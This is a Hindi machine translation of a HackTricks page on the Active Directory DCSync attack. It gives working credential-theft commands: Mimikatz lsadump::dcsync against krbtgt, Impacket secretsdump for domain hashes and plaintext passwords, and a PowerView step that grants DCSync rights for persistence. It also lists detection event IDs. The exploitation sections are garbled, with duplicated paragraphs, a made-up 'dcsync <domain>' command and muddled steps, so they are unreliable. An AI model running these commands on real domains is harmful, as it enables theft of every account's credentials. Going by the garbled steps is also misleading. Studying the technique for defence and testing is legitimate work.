hacktricks/windows-hardening/active-directory-methodology/dcsync.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

18 KiB

DCSync


Trickest का उपयोग करें और आसानी से वर्ल्ड के सबसे उन्नत सामुदायिक उपकरणों द्वारा संचालित ऑटोमेटिक वर्कफ़्लो बनाएं।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

DCSync

DCSync अनुमति में शामिल है कि डोमेन इसके ऊपर निम्नलिखित अनुमतियाँ हों: DS-Replication-Get-Changes, Replicating Directory Changes All और Replicating Directory Changes In Filtered Set

DCSync के बारे में महत्वपूर्ण नोट:

  • DCSync हमला एक डोमेन कंट्रोलर के व्यवहार की नकल करता है और अन्य डोमेन कंट्रोलर से जानकारी की प्रतिलिपि करने के लिए कहता है डायरेक्टरी रिप्लिकेशन सेवा रिमोट प्रोटोकॉल (MS-DRSR) का उपयोग करके। क्योंकि MS-DRSR एक मान्य और आवश्यक Active Directory की कार्यक्षमता है, इसे बंद नहीं किया जा सकता है और नहीं अक्षम किया जा सकता है।
  • डिफ़ॉल्ट रूप से केवल Domain Admins, Enterprise Admins, Administrators, and Domain Controllers समूहों के पास आवश्यक अधिकार होते हैं।
  • यदि किसी खाते के पास पुनर्वर्ती एन्क्रिप्शन के साथ संग्रहीत किए गए पासवर्ड होते हैं, तो Mimikatz में एक विकल्प उपलब्ध होता है जो साफ टेक्स्ट में पासवर्ड लौटाता है

जाँच

powerview का उपयोग करके इन अनुमतियों वाले लोगों की जाँच करें:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

स्थानीय रूप से शोषण करें

यह तकनीक उन स्थानीय हमलों को वर्णन करती है जो एक हमलावर को एक्टिव डायरेक्टरी डोमेन के अंदर एक डोमेन नियंत्रक के रूप में अधिकार प्राप्त करने की अनुमति देती है। इसके लिए, हमलावर को एक व्यक्ति के रूप में एक्टिव डायरेक्टरी डोमेन में पंजीकृत होना चाहिए और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हमलावर को एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में उपयोग किया जा सकता है और उसे डोमेन के सभी विवरणों को प्राप्त करने की अनुमति मिलती है, जिसमें सम्मिलित हैंडल, उपयोगकर्ता नाम, उपयोगकर्ता शब्दकोश, समूह, और अन्य विवरण हो सकते हैं।

इस तकनीक का उपयोग करने के लिए, हमें एक्टिव डायरेक्टरी डोमेन में एक उपयोगकर्ता के रूप में पंजीकृत होने की आवश्यकता होती है और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हम निम्नलिखित कमांड का उपयोग करके उपयोगकर्ता के रूप में एक्टिव डायरेक्टरी डोमेन में प्रमाणित हो सकते हैं:

kinit <username>@<domain>

इसके बाद, हम निम्नलिखित कमांड का उपयोग करके डोमेन के सभी विवरणों को प्राप्त कर सकते हैं:

dcsync <domain>

इस तकनीक का उपयोग करने के लिए, हमें एक्टिव डायरेक्टरी डोमेन में एक उपयोगकर्ता के रूप में पंजीकृत होने की आवश्यकता होती है और उसे एक्टिव डायरेक्टरी के एक डोमेन नियंत्रक के रूप में प्रमाणित करने की आवश्यकता होती है। इसके बाद, हम निम्नलिखित कमांड का उपयोग करके उपयोगकर्ता के रूप में एक्टिव डायरेक्टरी डोमेन में प्रमाणित हो सकते हैं:

kinit <username>@<domain>

इसके बाद, हम निम्नलिखित कमांड का उपयोग करके डोमेन के सभी विवरणों को प्राप्त कर सकते हैं:

dcsync <domain>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

दूरस्थ शोषण

इस तकनीक का उपयोग करके हम दूरस्थ संगणकों को शोषित कर सकते हैं। इसके लिए हमें निम्नलिखित कदमों का पालन करना होगा:

  1. एक विंडोज सिस्टम पर एक निर्दिष्ट उपयोगकर्ता खाता का निर्माण करें और उसे "डोमेन एडमिन" या "एंटरप्राइज एडमिन" की भूमिका दें।
  2. एक विंडोज सिस्टम पर "Impacket" टूलसेट को इंस्टॉल करें।
  3. निर्दिष्ट उपयोगकर्ता खाता के लिए "ntds.dit" फ़ाइल को डाउनलोड करें।
  4. "ntds.dit" फ़ाइल को "secretsdump.py" टूल का उपयोग करके शोषित करें।
  5. शोषित "ntds.dit" फ़ाइल से उपयोगकर्ता क्रेडेंशियल्स को प्राप्त करें।

इस तकनीक का उपयोग करके हम दूरस्थ संगणकों को शोषित कर सकते हैं और उपयोगकर्ता क्रेडेंशियल्स प्राप्त कर सकते हैं। इसके लिए हमें निम्नलिखित कदमों का पालन करना होगा:

  1. एक विंडोज सिस्टम पर एक निर्दिष्ट उपयोगकर्ता खाता का निर्माण करें और उसे "डोमेन एडमिन" या "एंटरप्राइज एडमिन" की भूमिका दें।
  2. एक विंडोज सिस्टम पर "Impacket" टूलसेट को इंस्टॉल करें।
  3. निर्दिष्ट उपयोगकर्ता खाता के लिए "ntds.dit" फ़ाइल को डाउनलोड करें।
  4. "ntds.dit" फ़ाइल को "secretsdump.py" टूल का उपयोग करके शोषित करें।
  5. शोषित "ntds.dit" फ़ाइल से उपयोगकर्ता क्रेडेंशियल्स को प्राप्त करें।
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc तीन फ़ाइलें उत्पन्न करता है:

  • एक में NTLM हैश होते हैं
  • एक में Kerberos कुंजी होती है
  • एक में NTDS से साफ़-पाठ पासवर्ड होते हैं जो पलटने योग्य एन्क्रिप्शन सक्षम किए गए होते हैं। आप पलटने योग्य एन्क्रिप्शन वाले उपयोगकर्ताओं को निम्नलिखित पावरव्यू के साथ प्राप्त कर सकते हैं:
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

स्थिरता

यदि आप डोमेन व्यवस्थापक हैं, तो आप powerview की सहायता से किसी भी उपयोगकर्ता को इस अनुमति प्रदान कर सकते हैं:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

तब आप यह जांच सकते हैं कि क्या उपयोगकर्ता को सही ढंग से असाइन किया गया है 3 विशेषाधिकारों को, उन्हें खोजकर देखें (आपको "ObjectType" फ़ील्ड के अंदर विशेषाधिकारों के नाम दिखाई देने चाहिए)।

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

रोकथाम

  • सुरक्षा ईवेंट आईडी 4662 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक ऑब्जेक्ट पर एक कार्रवाई की गई थी
  • सुरक्षा ईवेंट आईडी 5136 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक डायरेक्टरी सेवा ऑब्जेक्ट में संशोधन किया गया था
  • सुरक्षा ईवेंट आईडी 4670 (ऑब्जेक्ट के लिए ऑडिट नीति सक्षम होनी चाहिए) - एक ऑब्जेक्ट पर अनुमतियाँ बदल दी गई थी
  • AD ACL स्कैनर - ACL के बारे में रिपोर्ट बनाने और तुलना करने के लिए बनाएं। https://github.com/canix1/ADACLScanner

संदर्भ

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


Trickest का उपयोग करें और आसानी से बनाएं और स्वचालित कार्यप्रवाह बनाएं जो दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित होता है।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}